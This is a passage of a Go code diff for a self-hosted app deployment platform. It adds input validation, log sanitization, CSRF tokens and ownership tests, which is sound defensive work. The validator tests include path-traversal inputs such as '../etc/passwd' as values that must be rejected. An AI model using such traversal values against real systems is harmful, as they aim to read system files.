+	return strconv.Itoa(n)
+}
 
 // HandleAppLogs returns the container logs handler.
 func (h *Handlers) HandleAppLogs() http.HandlerFunc {
@@ -371,10 +499,7 @@ func (h *Handlers) HandleAppLogs() http.HandlerFunc {
 			return
 		}
 
-		tail := request.URL.Query().Get("tail")
+		tail := SanitizeTail(request.URL.Query().Get("tail"))
-		if tail == "" {
-			tail = defaultLogTail
-		}
 
 		logs, logsErr := h.docker.ContainerLogs(
 			request.Context(),
@@ -393,7 +518,7 @@ func (h *Handlers) HandleAppLogs() http.HandlerFunc {
 			return
 		}
 
-		_, _ = writer.Write([]byte(logs))
+		_, _ = writer.Write([]byte(SanitizeLogs(logs))) // #nosec G705 -- logs sanitized, Content-Type is text/plain
 	}
 }
 
@@ -428,7 +553,7 @@ func (h *Handlers) HandleDeploymentLogsAPI() http.HandlerFunc {
 
 		logs := ""
 		if deployment.Logs.Valid {
-			logs = deployment.Logs.String
+			logs = SanitizeLogs(deployment.Logs.String)
 		}
 
 		response := map[string]any{
@@ -475,8 +600,8 @@ func (h *Handlers) HandleDeploymentLogDownload() http.HandlerFunc {
 			return
 		}
 
-		// Check if file exists
+		// Check if file exists — logPath is constructed internally, not from user input
-		_, err := os.Stat(logPath)
+		_, err := os.Stat(logPath) // #nosec G703 -- path from internal GetLogFilePath, not user input
 		if os.IsNotExist(err) {
 			http.NotFound(writer, request)
 
@@ -555,7 +680,7 @@ func (h *Handlers) HandleContainerLogsAPI() http.HandlerFunc {
 		}
 
 		response := map[string]any{
-			"logs":   logs,
+			"logs":   SanitizeLogs(logs),
 			"status": status,
 		}
 
@@ -791,7 +916,7 @@ func (h *Handlers) HandleEnvVarAdd() http.HandlerFunc {
 func (h *Handlers) HandleEnvVarDelete() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
 		appID := chi.URLParam(request, "id")
-		envVarIDStr := chi.URLParam(request, "envID")
+		envVarIDStr := chi.URLParam(request, "varID")
 
 		envVarID, parseErr := strconv.ParseInt(envVarIDStr, 10, 64)
 		if parseErr != nil {
@@ -897,6 +1022,14 @@ func (h *Handlers) HandleVolumeAdd() http.HandlerFunc {
 			return
 		}
 
+		pathErr := validateVolumePaths(hostPath, containerPath)
+		if pathErr != nil {
+			h.log.Error("invalid volume path", "error", pathErr)
+			http.Redirect(writer, request, "/apps/"+application.ID, http.StatusSeeOther)
+
+			return
+		}
+
 		volume := models.NewVolume(h.db)
 		volume.AppID = application.ID
 		volume.HostPath = hostPath
@@ -995,7 +1128,12 @@ func parsePortValues(hostPortStr, containerPortStr string) (int, int, bool) {
 	hostPort, hostErr := strconv.Atoi(hostPortStr)
 	containerPort, containerErr := strconv.Atoi(containerPortStr)
 
-	if hostErr != nil || containerErr != nil || hostPort <= 0 || containerPort <= 0 {
+	const maxPort = 65535
+
+	invalid := hostErr != nil || containerErr != nil ||
+		hostPort <= 0 || containerPort <= 0 ||
+		hostPort > maxPort || containerPort > maxPort
+	if invalid {
 		return 0, 0, false
 	}
 
@@ -1031,6 +1169,207 @@ func (h *Handlers) HandlePortDelete() http.HandlerFunc {
 	}
 }
 
+// ErrVolumePathEmpty is returned when a volume path is empty.
+var ErrVolumePathEmpty = errors.New("path must not be empty")
+
+// ErrVolumePathNotAbsolute is returned when a volume path is not absolute.
+var ErrVolumePathNotAbsolute = errors.New("path must be absolute")
+
+// ErrVolumePathNotClean is returned when a volume path is not clean.
+var ErrVolumePathNotClean = errors.New("path must be clean")
+
+// ValidateVolumePath checks that a path is absolute and clean.
+func ValidateVolumePath(p string) error {
+	if p == "" {
+		return ErrVolumePathEmpty
+	}
+
+	if !filepath.IsAbs(p) {
+		return ErrVolumePathNotAbsolute
+	}
+
+	cleaned := filepath.Clean(p)
+	if cleaned != p {
+		return fmt.Errorf("%w (expected %q)", ErrVolumePathNotClean, cleaned)
+	}
+
+	return nil
+}
+
+// HandleEnvVarEdit handles editing an existing environment variable.
+func (h *Handlers) HandleEnvVarEdit() http.HandlerFunc {
+	return func(writer http.ResponseWriter, request *http.Request) {
+		appID := chi.URLParam(request, "id")
+		envVarIDStr := chi.URLParam(request, "varID")
+
+		envVarID, parseErr := strconv.ParseInt(envVarIDStr, 10, 64)
+		if parseErr != nil {
+			http.NotFound(writer, request)
+
+			return
+		}
+
+		envVar, findErr := models.FindEnvVar(request.Context(), h.db, envVarID)
+		if findErr != nil || envVar == nil || envVar.AppID != appID {
+			http.NotFound(writer, request)
+
+			return
+		}
+
+		formErr := request.ParseForm()
+		if formErr != nil {
+			http.Error(writer, "Bad Request", http.StatusBadRequest)
+
+			return
+		}
+
+		key := request.FormValue("key")
+		value := request.FormValue("value")
+
+		if key == "" || value == "" {
+			http.Redirect(writer, request, "/apps/"+appID, http.StatusSeeOther)
+
+			return
+		}
+
+		envVar.Key = key
+		envVar.Value = value
+
+		saveErr := envVar.Save(request.Context())
+		if saveErr != nil {
+			h.log.Error("failed to update env var", "error", saveErr)
+		}
+
+		http.Redirect(
+			writer,
+			request,
+			"/apps/"+appID+"?success=env-updated",
+			http.StatusSeeOther,
+		)
+	}
+}
+
+// HandleLabelEdit handles editing an existing label.
+func (h *Handlers) HandleLabelEdit() http.HandlerFunc {
+	return func(writer http.ResponseWriter, request *http.Request) {
+		appID := chi.URLParam(request, "id")
+		labelIDStr := chi.URLParam(request, "labelID")
+
+		labelID, parseErr := strconv.ParseInt(labelIDStr, 10, 64)
+		if parseErr != nil {
+			http.NotFound(writer, request)
+
+			return
+		}
+
+		label, findErr := models.FindLabel(request.Context(), h.db, labelID)
+		if findErr != nil || label == nil || label.AppID != appID {
+			http.NotFound(writer, request)
+
+			return
+		}
+
+		formErr := request.ParseForm()
+		if formErr != nil {
+			http.Error(writer, "Bad Request", http.StatusBadRequest)
+
+			return
+		}
+
+		key := request.FormValue("key")
+		value := request.FormValue("value")
+
+		if key == "" || value == "" {
+			http.Redirect(writer, request, "/apps/"+appID, http.StatusSeeOther)
+
+			return
+		}
+
+		label.Key = key
+		label.Value = value
+
+		saveErr := label.Save(request.Context())
+		if saveErr != nil {
+			h.log.Error("failed to update label", "error", saveErr)
+		}
+
+		http.Redirect(writer, request, "/apps/"+appID, http.StatusSeeOther)
+	}
+}
+
+// HandleVolumeEdit handles editing an existing volume mount.
+func (h *Handlers) HandleVolumeEdit() http.HandlerFunc {
+	return func(writer http.ResponseWriter, request *http.Request) {
+		appID := chi.URLParam(request, "id")
+		volumeIDStr := chi.URLParam(request, "volumeID")
+
+		volumeID, parseErr := strconv.ParseInt(volumeIDStr, 10, 64)
+		if parseErr != nil {
+			http.NotFound(writer, request)
+
+			return
+		}
+
+		volume, findErr := models.FindVolume(request.Context(), h.db, volumeID)
+		if findErr != nil || volume == nil || volume.AppID != appID {
+			http.NotFound(writer, request)
+
+			return
+		}
+
+		formErr := request.ParseForm()
+		if formErr != nil {
+			http.Error(writer, "Bad Request", http.StatusBadRequest)
+
+			return
+		}
+
+		hostPath := request.FormValue("host_path")
+		containerPath := request.FormValue("container_path")
+		readOnly := request.FormValue("readonly") == "1"
+
+		if hostPath == "" || containerPath == "" {
+			http.Redirect(writer, request, "/apps/"+appID, http.StatusSeeOther)
+
+			return
+		}
+
+		pathErr := validateVolumePaths(hostPath, containerPath)
+		if pathErr != nil {
+			h.log.Error("invalid volume path", "error", pathErr)
+			http.Redirect(writer, request, "/apps/"+appID, http.StatusSeeOther)
+
+			return
+		}
+
+		volume.HostPath = hostPath
+		volume.ContainerPath = containerPath
+		volume.ReadOnly = readOnly
+
+		saveErr := volume.Save(request.Context())
+		if saveErr != nil {
+			h.log.Error("failed to update volume", "error", saveErr)
+		}
+
+		http.Redirect(writer, request, "/apps/"+appID, http.StatusSeeOther)
+	}
+}
+
+// validateVolumePaths validates both host and container paths for a volume.
+func validateVolumePaths(hostPath, containerPath string) error {
+	hostErr := ValidateVolumePath(hostPath)
+	if hostErr != nil {
+		return fmt.Errorf("host path: %w", hostErr)
+	}
+
+	containerErr := ValidateVolumePath(containerPath)
+	if containerErr != nil {
+		return fmt.Errorf("container path: %w", containerErr)
+	}
+
+	return nil
+}
+
 // formatDeployKey formats an SSH public key with a descriptive comment.
 // Format: ssh-ed25519 AAAA... upaas_2025-01-15_myapp
 func formatDeployKey(pubKey string, createdAt time.Time, appName string) string {

internal/handlers/app_name_validation.go

@@ -0,0 +1,44 @@
+package handlers
+
+import (
+	"errors"
+	"regexp"
+	"strconv"
+)
+
+const (
+	// appNameMinLength is the minimum allowed length for an app name.
+	appNameMinLength = 2
+	// appNameMaxLength is the maximum allowed length for an app name.
+	appNameMaxLength = 63
+)
+
+// validAppNameRe matches names containing only lowercase alphanumeric characters and
+// hyphens, starting and ending with an alphanumeric character.
+var validAppNameRe = regexp.MustCompile(`^[a-z0-9][a-z0-9-]*[a-z0-9]$`)
+
+// validateAppName checks that the given app name is safe for use in Docker
+// container names, image tags, and file system paths.
+var (
+	errAppNameLength = errors.New(
+		"app name must be between " +
+			strconv.Itoa(appNameMinLength) + " and " +
+			strconv.Itoa(appNameMaxLength) + " characters",
+	)
+	errAppNamePattern = errors.New(
+		"app name must contain only lowercase letters, numbers, " +
+			"and hyphens, and must start and end with a letter or number",
+	)
+)
+
+func validateAppName(name string) error {
+	if len(name) < appNameMinLength || len(name) > appNameMaxLength {
+		return errAppNameLength
+	}
+
+	if !validAppNameRe.MatchString(name) {
+		return errAppNamePattern
+	}
+
+	return nil
+}

internal/handlers/app_name_validation_test.go

@@ -0,0 +1,48 @@
+package handlers //nolint:testpackage // testing unexported validateAppName
+
+import (
+	"testing"
+)
+
+func TestValidateAppName(t *testing.T) {
+	t.Parallel()
+
+	tests := []struct {
+		name    string
+		input   string
+		wantErr bool
+	}{
+		{"valid simple", "myapp", false},
+		{"valid with hyphen", "my-app", false},
+		{"valid with numbers", "app123", false},
+		{"valid two chars", "ab", false},
+		{"valid complex", "my-cool-app-v2", false},
+		{"valid all numbers", "123", false},
+		{"empty", "", true},
+		{"single char", "a", true},
+		{"too long", "a" + string(make([]byte, 63)), true},
+		{"exactly 63 chars", "a23456789012345678901234567890123456789012345678901234567890123", false},
+		{"64 chars", "a234567890123456789012345678901234567890123456789012345678901234", true},
+		{"uppercase", "MyApp", true},
+		{"spaces", "my app", true},
+		{"starts with hyphen", "-myapp", true},
+		{"ends with hyphen", "myapp-", true},
+		{"underscore", "my_app", true},
+		{"dot", "my.app", true},
+		{"slash", "my/app", true},
+		{"path traversal", "../etc/passwd", true},
+		{"special chars", "app@name!", true},
+		{"unicode", "appñame", true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			t.Parallel()
+
+			err := validateAppName(tt.input)
+			if (err != nil) != tt.wantErr {
+				t.Errorf("validateAppName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
+			}
+		})
+	}
+}

internal/handlers/auth.go

@@ -10,14 +10,10 @@ import (
 func (h *Handlers) HandleLoginGET() http.HandlerFunc {
 	tmpl := templates.GetParsed()
 
-	return func(writer http.ResponseWriter, _ *http.Request) {
+	return func(writer http.ResponseWriter, request *http.Request) {
-		data := h.addGlobals(map[string]any{})
+		data := h.addGlobals(map[string]any{}, request)
 
-		err := tmpl.ExecuteTemplate(writer, "login.html", data)
+		h.renderTemplate(writer, tmpl, "login.html", data)
-		if err != nil {
-			h.log.Error("template execution failed", "error", err)
-			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
-		}
 	}
 }
 
@@ -38,11 +34,11 @@ func (h *Handlers) HandleLoginPOST() http.HandlerFunc {
 
 		data := h.addGlobals(map[string]any{
 			"Username": username,
-		})
+		}, request)
 
 		if username == "" || password == "" {
 			data["Error"] = "Username and password are required"
-			_ = tmpl.ExecuteTemplate(writer, "login.html", data)
+			h.renderTemplate(writer, tmpl, "login.html", data)
 
 			return
 		}
@@ -50,7 +46,7 @@ func (h *Handlers) HandleLoginPOST() http.HandlerFunc {
 		user, authErr := h.auth.Authenticate(request.Context(), username, password)
 		if authErr != nil {
 			data["Error"] = "Invalid username or password"
-			_ = tmpl.ExecuteTemplate(writer, "login.html", data)
+			h.renderTemplate(writer, tmpl, "login.html", data)
 
 			return
 		}
@@ -60,7 +56,7 @@ func (h *Handlers) HandleLoginPOST() http.HandlerFunc {
 			h.log.Error("failed to create session", "error", sessionErr)
 
 			data["Error"] = "Failed to create session"
-			_ = tmpl.ExecuteTemplate(writer, "login.html", data)
+			h.renderTemplate(writer, tmpl, "login.html", data)
 
 			return
 		}

internal/handlers/dashboard.go

@@ -67,12 +67,8 @@ func (h *Handlers) HandleDashboard() http.HandlerFunc {
 
 		data := h.addGlobals(map[string]any{
 			"AppStats": appStats,
-		})
+		}, request)
 
-		execErr := tmpl.ExecuteTemplate(writer, "dashboard.html", data)
+		h.renderTemplate(writer, tmpl, "dashboard.html", data)
-		if execErr != nil {
-			h.log.Error("template execution failed", "error", execErr)
-			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
-		}
 	}
 }

internal/handlers/export_test.go

@@ -0,0 +1,6 @@
+package handlers
+
+// ValidateRepoURLForTest exports validateRepoURL for testing.
+func ValidateRepoURLForTest(repoURL string) error {
+	return validateRepoURL(repoURL)
+}

internal/handlers/handlers.go

@@ -2,10 +2,12 @@
 package handlers
 
 import (
+	"bytes"
 	"encoding/json"
 	"log/slog"
 	"net/http"
 
+	"github.com/gorilla/csrf"
 	"go.uber.org/fx"
 
 	"git.eeqj.de/sneak/upaas/internal/database"
@@ -17,6 +19,7 @@ import (
 	"git.eeqj.de/sneak/upaas/internal/service/auth"
 	"git.eeqj.de/sneak/upaas/internal/service/deploy"
 	"git.eeqj.de/sneak/upaas/internal/service/webhook"
+	"git.eeqj.de/sneak/upaas/templates"
 )
 
 // Params contains dependencies for Handlers.
@@ -64,14 +67,43 @@ func New(_ fx.Lifecycle, params Params) (*Handlers, error) {
 	}, nil
 }
 
-// addGlobals adds version info to template data map.
+// addGlobals adds version info and CSRF token to template data map.
-func (h *Handlers) addGlobals(data map[string]any) map[string]any {
+func (h *Handlers) addGlobals(
+	data map[string]any,
+	request *http.Request,
+) map[string]any {
 	data["Version"] = h.globals.Version
 	data["Appname"] = h.globals.Appname
 
+	if request != nil {
+		data["CSRFField"] = csrf.TemplateField(request)
+	}
+
 	return data
 }
 
+// renderTemplate executes the named template into a buffer first, then writes
+// to the ResponseWriter only on success. This prevents partial/corrupt HTML
+// responses when template execution fails partway through.
+func (h *Handlers) renderTemplate(
+	writer http.ResponseWriter,
+	tmpl *templates.TemplateExecutor,
+	name string,
+	data any,
+) {
+	var buf bytes.Buffer
+
+	err := tmpl.ExecuteTemplate(&buf, name, data)
+	if err != nil {
+		h.log.Error("template execution failed", "error", err)
+		http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
+
+		return
+	}
+
+	_, _ = buf.WriteTo(writer)
+}
+
 func (h *Handlers) respondJSON(
 	writer http.ResponseWriter,
 	_ *http.Request,

internal/handlers/handlers_test.go

@@ -24,6 +24,7 @@ import (
 	"git.eeqj.de/sneak/upaas/internal/handlers"
 	"git.eeqj.de/sneak/upaas/internal/healthcheck"
 	"git.eeqj.de/sneak/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/middleware"
 	"git.eeqj.de/sneak/upaas/internal/service/app"
 	"git.eeqj.de/sneak/upaas/internal/service/auth"
 	"git.eeqj.de/sneak/upaas/internal/service/deploy"
@@ -32,10 +33,11 @@ import (
 )
 
 type testContext struct {
-	handlers *handlers.Handlers
+	handlers   *handlers.Handlers
-	database *database.Database
+	database   *database.Database
-	authSvc  *auth.Service
+	authSvc    *auth.Service
-	appSvc   *app.Service
+	appSvc     *app.Service
+	middleware *middleware.Middleware
 }
 
 func createTestConfig(t *testing.T) *config.Config {
@@ -166,11 +168,20 @@ func setupTestHandlers(t *testing.T) *testContext {
 	)
 	require.NoError(t, handlerErr)
 
+	mw, mwErr := middleware.New(fx.Lifecycle(nil), middleware.Params{
+		Logger:  logInstance,
+		Globals: globalInstance,
+		Config:  cfg,
+		Auth:    authSvc,
+	})
+	require.NoError(t, mwErr)
+
 	return &testContext{
-		handlers: handlersInstance,
+		handlers:   handlersInstance,
-		database: dbInstance,
+		database:   dbInstance,
-		authSvc:  authSvc,
+		authSvc:    authSvc,
-		appSvc:   appSvc,
+		appSvc:     appSvc,
+		middleware: mw,
 	}
 }
 
@@ -393,6 +404,25 @@ func TestHandleDashboard(t *testing.T) {
 		assert.Equal(t, http.StatusOK, recorder.Code)
 		assert.Contains(t, recorder.Body.String(), "Applications")
 	})
+
+	t.Run("renders dashboard with apps without crashing on CSRFField", func(t *testing.T) {
+		t.Parallel()
+
+		testCtx := setupTestHandlers(t)
+
+		// Create an app so the template iterates over AppStats and hits .CSRFField
+		createTestApp(t, testCtx, "csrf-test-app")
+
+		request := httptest.NewRequest(http.MethodGet, "/", nil)
+		recorder := httptest.NewRecorder()
+
+		handler := testCtx.handlers.HandleDashboard()
+		handler.ServeHTTP(recorder, request)
+
+		assert.Equal(t, http.StatusOK, recorder.Code,
+			"dashboard should not 500 when apps exist (CSRFField must be accessible)")
+		assert.Contains(t, recorder.Body.String(), "csrf-test-app")
+	})
 }
 
 func TestHandleAppNew(t *testing.T) {
@@ -450,85 +480,156 @@ func createTestApp(
 	return createdApp
 }
 
-// TestDeleteEnvVarOwnershipVerification tests that deleting an env var
+// TestHandleWebhookRejectsOversizedBody tests that oversized webhook payloads
-// via another app's URL path returns 404 (IDOR prevention).
+// are handled gracefully.
-func TestDeleteEnvVarOwnershipVerification(t *testing.T) {
+func TestHandleWebhookRejectsOversizedBody(t *testing.T) {
 	t.Parallel()
 
 	testCtx := setupTestHandlers(t)
 
-	app1 := createTestApp(t, testCtx, "envvar-owner-app")
+	// Create an app first
-	app2 := createTestApp(t, testCtx, "envvar-other-app")
+	createdApp, createErr := testCtx.appSvc.CreateApp(
+		context.Background(),
+		app.CreateAppInput{
+			Name:    "oversize-test-app",
+			RepoURL: "git@example.com:user/repo.git",
+			Branch:  "main",
+		},
+	)
+	require.NoError(t, createErr)
 
-	// Create env var belonging to app1
+	// Create a body larger than 1MB - it should be silently truncated
-	envVar := models.NewEnvVar(testCtx.database)
+	// and the webhook should still process (or fail gracefully on parse)
-	envVar.AppID = app1.ID
+	largePayload := strings.Repeat("x", 2*1024*1024) // 2MB
-	envVar.Key = "SECRET"
-	envVar.Value = "hunter2"
-	require.NoError(t, envVar.Save(context.Background()))
-
-	// Try to delete app1's env var using app2's URL path
 	request := httptest.NewRequest(
 		http.MethodPost,
-		"/apps/"+app2.ID+"/env/"+strconv.FormatInt(envVar.ID, 10)+"/delete",
+		"/webhook/"+createdApp.WebhookSecret,
-		nil,
+		strings.NewReader(largePayload),
 	)
-	request = addChiURLParams(request, map[string]string{
+	request = addChiURLParams(
-		"id":    app2.ID,
+		request,
-		"envID": strconv.FormatInt(envVar.ID, 10),
+		map[string]string{"secret": createdApp.WebhookSecret},
-	})
+	)
+	request.Header.Set("Content-Type", "application/json")
+	request.Header.Set("X-Gitea-Event", "push")
+
 	recorder := httptest.NewRecorder()
 
-	handler := testCtx.handlers.HandleEnvVarDelete()
+	handler := testCtx.handlers.HandleWebhook()
 	handler.ServeHTTP(recorder, request)
 
-	// Should return 404 because the env var doesn't belong to app2
+	// Should still return OK (payload is truncated and fails JSON parse,
-	assert.Equal(t, http.StatusNotFound, recorder.Code)
+	// but webhook service handles invalid JSON gracefully)
+	assert.Equal(t, http.StatusOK, recorder.Code)
+}
 
-	// Verify the env var was NOT deleted
+// ownedResourceTestConfig configures an IDOR ownership verification test.
-	found, err := models.FindEnvVar(context.Background(), testCtx.database, envVar.ID)
+type ownedResourceTestConfig struct {
-	require.NoError(t, err)
+	appPrefix1 string
-	assert.NotNil(t, found, "env var should still exist after IDOR attempt")
+	appPrefix2 string
+	createFn   func(t *testing.T, tc *testContext, app *models.App) int64
+	deletePath func(appID string, resourceID int64) string
+	chiParams  func(appID string, resourceID int64) map[string]string
+	handler    func(h *handlers.Handlers) http.HandlerFunc
+	verifyFn   func(t *testing.T, tc *testContext, resourceID int64)
+}
+
+func testOwnershipVerification(t *testing.T, cfg ownedResourceTestConfig) {
+	t.Helper()
+
+	testCtx := setupTestHandlers(t)
+
+	app1 := createTestApp(t, testCtx, cfg.appPrefix1)
+	app2 := createTestApp(t, testCtx, cfg.appPrefix2)
+
+	resourceID := cfg.createFn(t, testCtx, app1)
+
+	request := httptest.NewRequest(
+		http.MethodPost,
+		cfg.deletePath(app2.ID, resourceID),
+		nil,
+	)
+	request = addChiURLParams(request, cfg.chiParams(app2.ID, resourceID))
+
+	recorder := httptest.NewRecorder()
+
+	handler := cfg.handler(testCtx.handlers)
+	handler.ServeHTTP(recorder, request)
+
+	assert.Equal(t, http.StatusNotFound, recorder.Code)
+	cfg.verifyFn(t, testCtx, resourceID)
+}
+
+// TestDeleteEnvVarOwnershipVerification tests that deleting an env var
+// via another app's URL path returns 404 (IDOR prevention).
+func TestDeleteEnvVarOwnershipVerification(t *testing.T) { //nolint:dupl // intentionally similar IDOR test pattern
+	t.Parallel()
+
+	testOwnershipVerification(t, ownedResourceTestConfig{
+		appPrefix1: "envvar-owner-app",
+		appPrefix2: "envvar-other-app",
+		createFn: func(t *testing.T, tc *testContext, ownerApp *models.App) int64 {
+			t.Helper()
+
+			envVar := models.NewEnvVar(tc.database)
+			envVar.AppID = ownerApp.ID
+			envVar.Key = "SECRET"
+			envVar.Value = "hunter2"
+			require.NoError(t, envVar.Save(context.Background()))
+
+			return envVar.ID
+		},
+		deletePath: func(appID string, resourceID int64) string {
+			return "/apps/" + appID + "/env/" + strconv.FormatInt(resourceID, 10) + "/delete"
+		},
+		chiParams: func(appID string, resourceID int64) map[string]string {
+			return map[string]string{"id": appID, "varID": strconv.FormatInt(resourceID, 10)}
+		},
+		handler: func(h *handlers.Handlers) http.HandlerFunc { return h.HandleEnvVarDelete() },
+		verifyFn: func(t *testing.T, tc *testContext, resourceID int64) {
+			t.Helper()
+
+			found, findErr := models.FindEnvVar(context.Background(), tc.database, resourceID)
+			require.NoError(t, findErr)
+			assert.NotNil(t, found, "env var should still exist after IDOR attempt")
+		},
+	})
 }
 
 // TestDeleteLabelOwnershipVerification tests that deleting a label
 // via another app's URL path returns 404 (IDOR prevention).
-func TestDeleteLabelOwnershipVerification(t *testing.T) {
+func TestDeleteLabelOwnershipVerification(t *testing.T) { //nolint:dupl // intentionally similar IDOR test pattern
 	t.Parallel()
 
-	testCtx := setupTestHandlers(t)
+	testOwnershipVerification(t, ownedResourceTestConfig{
+		appPrefix1: "label-owner-app",
+		appPrefix2: "label-other-app",
+		createFn: func(t *testing.T, tc *testContext, ownerApp *models.App) int64 {
+			t.Helper()
 
-	app1 := createTestApp(t, testCtx, "label-owner-app")
+			lbl := models.NewLabel(tc.database)
-	app2 := createTestApp(t, testCtx, "label-other-app")
+			lbl.AppID = ownerApp.ID
+			lbl.Key = "traefik.enable"
+			lbl.Value = "true"
+			require.NoError(t, lbl.Save(context.Background()))
 
-	// Create label belonging to app1
+			return lbl.ID
-	label := models.NewLabel(testCtx.database)
+		},
-	label.AppID = app1.ID
+		deletePath: func(appID string, resourceID int64) string {
-	label.Key = "traefik.enable"
+			return "/apps/" + appID + "/labels/" + strconv.FormatInt(resourceID, 10) + "/delete"
-	label.Value = "true"
+		},
-	require.NoError(t, label.Save(context.Background()))
+		chiParams: func(appID string, resourceID int64) map[string]string {
+			return map[string]string{"id": appID, "labelID": strconv.FormatInt(resourceID, 10)}
+		},
+		handler: func(h *handlers.Handlers) http.HandlerFunc { return h.HandleLabelDelete() },
+		verifyFn: func(t *testing.T, tc *testContext, resourceID int64) {
+			t.Helper()
 
-	// Try to delete app1's label using app2's URL path
+			found, findErr := models.FindLabel(context.Background(), tc.database, resourceID)
-	request := httptest.NewRequest(
+			require.NoError(t, findErr)
-		http.MethodPost,
+			assert.NotNil(t, found, "label should still exist after IDOR attempt")
-		"/apps/"+app2.ID+"/labels/"+strconv.FormatInt(label.ID, 10)+"/delete",
+		},
-		nil,
-	)
-	request = addChiURLParams(request, map[string]string{
-		"id":      app2.ID,
-		"labelID": strconv.FormatInt(label.ID, 10),
 	})
-	recorder := httptest.NewRecorder()
-
-	handler := testCtx.handlers.HandleLabelDelete()
-	handler.ServeHTTP(recorder, request)
-
-	assert.Equal(t, http.StatusNotFound, recorder.Code)
-
-	// Verify the label was NOT deleted
-	found, err := models.FindLabel(context.Background(), testCtx.database, label.ID)
-	require.NoError(t, err)
-	assert.NotNil(t, found, "label should still exist after IDOR attempt")
 }
 
 // TestDeleteVolumeOwnershipVerification tests that deleting a volume
@@ -613,6 +714,194 @@ func TestDeletePortOwnershipVerification(t *testing.T) {
 	assert.NotNil(t, found, "port should still exist after IDOR attempt")
 }
 
+// TestHandleEnvVarDeleteUsesCorrectRouteParam verifies that HandleEnvVarDelete
+// reads the "varID" chi URL parameter (matching the route definition {varID}),
+// not a mismatched name like "envID".
+func TestHandleEnvVarDeleteUsesCorrectRouteParam(t *testing.T) {
+	t.Parallel()
+
+	testCtx := setupTestHandlers(t)
+
+	createdApp := createTestApp(t, testCtx, "envdelete-param-app")
+
+	envVar := models.NewEnvVar(testCtx.database)
+	envVar.AppID = createdApp.ID
+	envVar.Key = "DELETE_ME"
+	envVar.Value = "gone"
+	require.NoError(t, envVar.Save(context.Background()))
+
+	// Use chi router with the real route pattern to test param name
+	r := chi.NewRouter()
+	r.Post("/apps/{id}/env-vars/{varID}/delete", testCtx.handlers.HandleEnvVarDelete())
+
+	request := httptest.NewRequest(
+		http.MethodPost,
+		"/apps/"+createdApp.ID+"/env-vars/"+strconv.FormatInt(envVar.ID, 10)+"/delete",
+		nil,
+	)
+	recorder := httptest.NewRecorder()
+
+	r.ServeHTTP(recorder, request)
+
+	assert.Equal(t, http.StatusSeeOther, recorder.Code)
+
+	// Verify the env var was actually deleted
+	found, findErr := models.FindEnvVar(context.Background(), testCtx.database, envVar.ID)
+	require.NoError(t, findErr)
+	assert.Nil(t, found, "env var should be deleted when using correct route param")
+}
+
+// TestHandleVolumeAddValidatesPaths verifies that HandleVolumeAdd validates
+// host and container paths (same as HandleVolumeEdit).
+func TestHandleVolumeAddValidatesPaths(t *testing.T) {
+	t.Parallel()
+
+	testCtx := setupTestHandlers(t)
+
+	createdApp := createTestApp(t, testCtx, "volume-validate-app")
+
+	tests := []struct {
+		name          string
+		hostPath      string
+		containerPath string
+		shouldCreate  bool
+	}{
+		{"relative host path rejected", "relative/path", "/container", false},
+		{"relative container path rejected", "/host", "relative/path", false},
+		{"unclean host path rejected", "/host/../etc", "/container", false},
+		{"valid paths accepted", "/host/data", "/container/data", true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			t.Parallel()
+
+			form := url.Values{}
+			form.Set("host_path", tt.hostPath)
+			form.Set("container_path", tt.containerPath)
+
+			request := httptest.NewRequest(
+				http.MethodPost,
+				"/apps/"+createdApp.ID+"/volumes",
+				strings.NewReader(form.Encode()),
+			)
+			request.Header.Set("Content-Type", "application/x-www-form-urlencoded")
+			request = addChiURLParams(request, map[string]string{"id": createdApp.ID})
+
+			recorder := httptest.NewRecorder()
+
+			handler := testCtx.handlers.HandleVolumeAdd()
+			handler.ServeHTTP(recorder, request)
+
+			assert.Equal(t, http.StatusSeeOther, recorder.Code)
+
+			// Check if volume was created by listing volumes
+			volumes, _ := createdApp.GetVolumes(context.Background())
+			found := false
+
+			for _, v := range volumes {
+				if v.HostPath == tt.hostPath && v.ContainerPath == tt.containerPath {
+					found = true
+					// Clean up for isolation
+					_ = v.Delete(context.Background())
+				}
+			}
+
+			if tt.shouldCreate {
+				assert.True(t, found, "volume should be created for valid paths")
+			} else {
+				assert.False(t, found, "volume should NOT be created for invalid paths")
+			}
+		})
+	}
+}
+
+// TestSetupRequiredExemptsHealthAndStaticAndAPI verifies that the SetupRequired
+// middleware allows /health, /s/*, and /api/* paths through even when setup is required.
+func TestSetupRequiredExemptsHealthAndStaticAndAPI(t *testing.T) {
+	t.Parallel()
+
+	testCtx := setupTestHandlers(t)
+
+	// No user created, so setup IS required
+	mw := testCtx.middleware.SetupRequired()
+
+	okHandler := http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusOK)
+		_, _ = w.Write([]byte("OK"))
+	})
+
+	wrapped := mw(okHandler)
+
+	exemptPaths := []string{"/health", "/s/style.css", "/s/js/app.js", "/api/v1/apps", "/api/v1/login"}
+
+	for _, path := range exemptPaths {
+		t.Run(path, func(t *testing.T) {
+			t.Parallel()
+
+			req := httptest.NewRequest(http.MethodGet, path, nil)
+			rr := httptest.NewRecorder()
+			wrapped.ServeHTTP(rr, req)
+
+			assert.Equal(t, http.StatusOK, rr.Code,
+				"path %s should be exempt from setup redirect", path)
+		})
+	}
+
+	// Non-exempt path should redirect to /setup
+	t.Run("non-exempt redirects", func(t *testing.T) {
+		t.Parallel()
+
+		req := httptest.NewRequest(http.MethodGet, "/", nil)
+		rr := httptest.NewRecorder()
+		wrapped.ServeHTTP(rr, req)
+
+		assert.Equal(t, http.StatusSeeOther, rr.Code)
+		assert.Equal(t, "/setup", rr.Header().Get("Location"))
+	})
+}
+
+func TestHandleCancelDeployRedirects(t *testing.T) {
+	t.Parallel()
+
+	testCtx := setupTestHandlers(t)
+
+	createdApp := createTestApp(t, testCtx, "cancel-deploy-app")
+
+	request := httptest.NewRequest(
+		http.MethodPost,
+		"/apps/"+createdApp.ID+"/deployments/cancel",
+		nil,
+	)
+	request = addChiURLParams(request, map[string]string{"id": createdApp.ID})
+	recorder := httptest.NewRecorder()
+
+	handler := testCtx.handlers.HandleCancelDeploy()
